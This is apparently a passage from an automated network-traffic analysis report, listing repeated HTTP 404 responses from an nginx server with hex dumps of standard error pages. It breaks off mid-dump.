0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:14:07 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:14:10 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:14:12 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:14:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:14:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:14:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:14:26 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
